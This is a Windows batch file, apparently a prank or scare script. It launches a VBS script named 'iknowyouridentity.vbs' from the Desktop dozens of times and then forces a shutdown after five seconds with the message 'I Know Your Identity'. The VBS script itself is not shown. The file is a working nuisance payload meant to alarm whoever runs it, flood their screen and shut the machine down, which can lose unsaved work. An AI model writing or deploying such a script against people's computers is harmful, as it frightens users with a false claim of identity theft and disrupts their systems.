@echo off
cd Desktop
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
start iknowyouridentity.vbs
shutdown -s -t 5 -c "I Know Your Identity"